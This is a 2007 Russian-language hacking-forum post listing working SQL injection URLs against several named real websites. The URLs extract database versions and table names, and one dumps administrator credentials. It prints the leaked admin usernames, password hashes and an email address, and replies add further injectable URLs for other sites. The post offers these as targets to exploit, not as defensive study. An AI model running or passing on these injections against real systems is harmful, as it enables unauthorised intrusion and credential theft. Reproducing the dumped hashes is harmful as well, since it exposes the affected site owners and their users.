09.05.2007, 12:49
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-injections
Xage.ru (молодежный портал)
смотрим версию
Код:
http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,0,1,2,3,4/*
а она пятая. (вывод в строке поиска).
смотрим таблицы
Код:
http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+252,1/*
так навскидку обращаем внимание на таблицы access, administrator, exp_members, user.
аналогично смотрим поля в таблицах
Код:
http://xage.ru/comments.php?id=1708+and+1=0+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,0,1,2,3,4+from+exp_members+limit+0,1/*
в первых двух не нашел ничего интересного, в exp_members есть поля username,password,authcode,email
Admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
таблица user относится к форуму vB , и поля там соответственные.
1: Admin:f1e82a7d9d6f8a25019349e1982d4f24: W%L:admin@xage.ru
---------------------------------------------------------------------
Сообщение от Y.Dmitriy
Я в этом сильно не шарю но помоему скуль тут есть а там сами смотрите... если нет, то пусть модуры удалять...
http://smru.com.ua/globalnews.php?type=n&num=-1579+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5/*
----------------------------------------------------------------------
Y.Dmitriy, примеры погляди и все на свои места сразу встанет.
и есчооо
http://khomutynnik.info/view.php?type=list&status=0'&p=1'
http://khomutynnik.info/view.php?type=list&p=1&status=0+and+1=0+union+sele ct+1,2,3,concat_ws(0x3a,user(),version(),database( ))/*
Последний раз редактировалось _Pantera_; 11.05.2007 в 22:36..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид